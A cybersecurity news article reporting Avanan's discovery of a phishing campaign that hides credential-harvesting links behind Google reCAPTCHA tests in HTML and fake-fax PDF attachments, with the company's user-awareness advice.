Hackers spotted using CAPTCHAs to dodge email security scanners

A CAPTCHA verification check on a data entry field

A new phishing campaign has been discovered using CAPTCHA verification tests to bypass email security scanners.

CAPTCHAs are cognitive tests that websites present to ensure that they're interacting with humans rather than automated bots.

Researcher breaks Google CAPTCHA using speech-to-text AI The top 12 password-cracking techniques used by hackers

According to cyber security company Avanan, the new campaign is using a technique that the company itself demonstrated over a year ago to bypass secure email gateways.

Email scanners typically compare links in emails against a known list of malicious domains gathered from threat intelligence feeds and blacklists. Sending a CAPTCHA instead of a direct URL effectively masks the phishing link from automated checks, as it takes human interaction to solve.

Phishing emails using CAPTCHAs will attach them as HMTL files that look clean to a secure email gateway, Avanan said. Some email clients might even render the HTML file when displaying the message if they can't find anything dangerous about it.

If a victim opens the HTML file containing a CAPTCHA and solves it, the browser will then show them a phishing page asking them to enter their credentials.

Avanan has found attackers using this technique when sending emails from legitimate domains. In one case, the company said that a criminal used a compromised university domain to send an email containing a CAPTCHA.

Instead of embedding the test in an HTML file, the attacker uses a non-password-protected PDF purporting to be a faxed document. When opened, the PDF takes the user to a site with a CAPTCHA.

Upon solving the CAPTCHA, the phishing site presents the victim with a fake Microsoft authentication window asking for their login credentials.

Attackers typically use Google's reCAPTCHA service, which it provides free to developers. Because security scanning systems can't realistically block Google, the reCAPTCHA is sure to be delivered, Avanan explains. Using a spoofed Microsoft OneDrive site adds another layer of apparent legitimacy to the phishing attack, researchers added.

Avanan's best practices for avoiding the attack focus on user awareness rather than technical solutions.

Users should check URLs before filling out CAPTCHA forms, it said. They should also ask whether the PDF should have been password protected, and query the sender to find if they were in the office or working from home. "If working form home, odds are that they did not fax it," the company concluded.

Danny Bradbury

Danny Bradbury has been a print journalist specialising in technology since 1989 and a freelance writer since 1994. He has written for national publications on both sides of the Atlantic and has won awards for his investigative cybersecurity journalism work and his arts and culture writing. 

Danny writes about many different technology issues for audiences ranging from consumers through to software developers and CIOs. He also ghostwrites articles for many C-suite business executives in the technology sector and has worked as a presenter for multiple webinars and podcasts.